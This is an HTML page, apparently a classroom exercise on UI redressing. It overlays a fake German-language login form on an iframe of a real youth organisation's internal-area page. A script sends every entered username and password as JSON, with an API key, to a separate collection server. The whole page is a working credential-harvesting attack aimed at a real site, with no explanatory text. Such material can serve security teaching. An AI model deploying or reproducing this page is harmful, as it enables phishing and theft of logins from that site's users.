<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="UIRedressing.css">
    <title>Document</title>
</head>

<body>
    <div id="container">
            <input name="username" id="username"></input>
            <input name="password" id="password" type="password"></input>
            <br>
            <button type="submit" id="submit" name="submit">Anmelden</button>
    </div>

    <iframe id="iframe" scrolling="no" src="https://www.jublaudligenswil.ch/interner-bereich/"
        title="jublaudligenswil"></iframe>

    <script>
        const button = document.getElementById("submit");
        button.onclick = function (event) {
          usernameValue = document.getElementById('username').value;
          passwordValue = document.getElementById('password').value;
          
          const payload = {
            "username": usernameValue,
            "password": passwordValue
          };
          
          fetch('https://m183.gibz-informatik.ch/api/uiredresscredential', {
            method: 'POST',
            headers: {
              'Content-Type': 'application/json',
              'X-Api-Key': 'NQA3ADYAOAAxADcANAAyADgANQA2ADYAMgAwADgAMgA0ADUA',
            },
            body: JSON.stringify(payload),
          });

          // document.location.href = "UiRedressingSuccess.html";
        }   
    </script>

</body>

</html>